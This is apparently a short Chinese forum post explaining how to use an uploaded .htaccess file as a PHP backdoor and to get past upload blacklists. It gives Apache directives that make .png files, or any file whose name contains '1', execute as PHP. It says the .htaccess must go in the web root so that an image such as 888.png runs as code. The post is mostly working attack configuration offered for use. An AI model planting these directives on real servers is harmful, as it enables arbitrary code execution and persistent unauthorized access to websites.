小黄人 发表于 2021-1-5 16:31:30

.htaccess文件构成的PHP后门

一般 `.htaccess` 可以用来留后门和针对黑名单绕过

创建一个 txt 写入(png 解析为 PHP)

```
AddType application/x-httpd-php .png
```

另存为 `.htaccess`

上传 `.htaccess` 必须是网站根路径

可以在 `.htaccess ` 加入 PHP 解析规则

类似于把文件名包含 1 的解析成 PHP

```
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
```

**888.png**就会以 **PHP** 执行
页: [1]
查看完整版本: .htaccess文件构成的PHP后门